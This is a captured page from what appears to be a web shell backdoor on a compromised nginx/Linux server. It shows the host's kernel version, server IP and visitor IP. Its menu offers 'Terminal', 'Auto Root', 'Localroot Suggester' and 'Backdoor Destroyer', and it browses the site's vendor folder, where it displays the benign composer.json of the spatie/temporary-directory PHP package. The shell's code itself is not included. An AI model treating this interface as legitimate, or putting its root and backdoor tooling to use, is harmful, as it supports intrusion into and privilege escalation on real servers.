Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.222.23.166
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp /
vendor /
spatie /
temporary-directory /
Delete
Unzip
Name
Size
Permission
Date
Action
.github
[ DIR ]
drwxr-xr-x
2020-11-09 09:00
src
[ DIR ]
drwxr-xr-x
2020-11-09 09:00
.php_cs.dist
1.25
KB
-rw-r--r--
2020-11-09 09:00
CHANGELOG.md
1.19
KB
-rw-r--r--
2020-11-09 09:00
LICENSE.md
1.06
KB
-rw-r--r--
2020-11-09 09:00
README.md
4.79
KB
-rw-r--r--
2020-11-09 09:00
composer.json
944
B
-rw-r--r--
2020-11-09 09:00
Save
Rename
{ "name": "spatie/temporary-directory", "description": "Easily create, use and destroy temporary directories", "keywords": [ "spatie", "php", "temporary-directory" ], "homepage": "https://github.com/spatie/temporary-directory", "license": "MIT", "authors": [ { "name": "Alex Vanderbist", "email": "alex@spatie.be", "homepage": "https://spatie.be", "role": "Developer" } ], "require": { "php": "^7.2|^8.0" }, "require-dev": { "phpunit/phpunit": "^8.0|^9.0" }, "autoload": { "psr-4": { "Spatie\\TemporaryDirectory\\": "src" } }, "autoload-dev": { "psr-4": { "Spatie\\TemporaryDirectory\\Test\\": "tests" } }, "scripts": { "test": "vendor/bin/phpunit" }, "config": { "sort-packages": true } }